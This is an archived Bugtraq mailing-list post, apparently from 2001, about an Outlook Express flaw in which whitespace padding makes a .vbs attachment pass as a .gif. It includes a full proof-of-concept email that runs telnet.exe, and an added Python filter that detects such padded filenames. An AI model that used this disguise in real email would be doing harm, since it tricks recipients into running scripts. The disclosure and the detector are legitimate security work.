Email email text or death

From: Tom Whore (tomwhore@inetarena.com)
Date: Fri Jan 19 2001 - 09:22:24 PST


---------- Forwarded message ----------
Date: Fri, 19 Jan 2001 09:19:45 -0000
From: Shane Hird <s.hird@STUDENT.QUT.EDU.AU>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: HTML.dropper

Hi,

With some testing, I've found that the
'subject-overflow' problem is irrelevant to the 'filename
overflow' problem, although as mentioned, this may
help to overcome some email filters/scanners.

It seems OE is cutting the file name short to a
specified length when trying to open it (consequently
chopping off the real extension), but not cutting it
short when determining which icon to use. (Note that
the icon choice doesn't seem to be affected like this
with the subject overflow problem.)

The following is an example which will produce
a 'normal' email, with a standard attachment,
however the 'filename' of the attachment is four
characters too long, which just happens to be
the '.gif' which gets chopped off, leaving just '.vbs'.

The filename displayed for the attachment will
be 'nicepic.gif', followed by a lot of spaces which
obviously aren't seen. Adjust the filename size as
necessary for the client in question. I predict a new
breed of i-worm to be using this technique in a short
while.

<snip email.eml>

To: "anyone@home.com"
Subject:anything
Date: Fri, 19 Jan 2001 18:44:39 +1000
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_000B_01C08247.E5DF4F00"

------=_NextPart_000_000B_01C08247.E5DF4F00
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
        filename="nicepic.gif
                                                                                       
                                                                                       
                                .vbs.gif"

set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run("telnet.exe")

------=_NextPart_000_000B_01C08247.E5DF4F00

</snip>

I apologise if this is already known, however I felt it
should be clarified for this thread.

-Shane
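
A mail-filter check for the disguise described in the post above, as an added example that is not part of the original message: it flags attachment filenames that carry a long whitespace run or a script extension anywhere in the name, not only at the end. The extension list, the padding threshold and the sample message (with an inert body) are assumptions constructed for illustration.

```python
import re
from email import message_from_string

# Assumed values for illustration; tune both to local policy.
RISKY_EXT = ("vbs", "vbe", "js", "jse", "wsf", "wsh",
             "exe", "scr", "pif", "bat", "cmd", "hta")
RISKY_RE = re.compile(r"\.(%s)(?![A-Za-z0-9])" % "|".join(RISKY_EXT), re.I)
PAD_RE = re.compile(r"\s{8,}")  # run of whitespace long enough to hide a suffix

def inspect_filename(name):
    """Return the reasons an attachment filename looks disguised."""
    reasons = []
    if PAD_RE.search(name):
        reasons.append("whitespace-padding")
    # Scan the whole name, not only the last extension: a client that
    # truncates the name can expose an extension buried mid-string.
    buried = sorted({m.group(1).lower() for m in RISKY_RE.finditer(name)})
    if buried:
        reasons.append("risky-extension:" + ",".join(buried))
    return reasons

def scan_message(raw):
    """Map each suspicious attachment filename in a raw message to its findings."""
    findings = {}
    for part in message_from_string(raw).walk():
        name = part.get_filename()
        if name:
            hits = inspect_filename(name)
            if hits:
                findings[name] = hits
    return findings

# Constructed sample: same header shape as the post, placeholder body.
SAMPLE = (
    "To: anyone@example.invalid\n"
    "Subject: anything\n"
    "MIME-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="b1"\n'
    "\n"
    "--b1\n"
    "Content-Type: image/gif\n"
    "Content-Disposition: attachment;\n"
    '        filename="nicepic.gif\n'
    + " " * 60 + '.vbs.gif"\n'
    "\n"
    "placeholder body\n"
    "--b1--\n"
)
```

Because the check looks at every extension in the name, it does not depend on knowing the length at which a particular client truncates.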



This archive was generated by hypermail 2b29 : Fri Apr 27 2001 - 23:18:54 PDT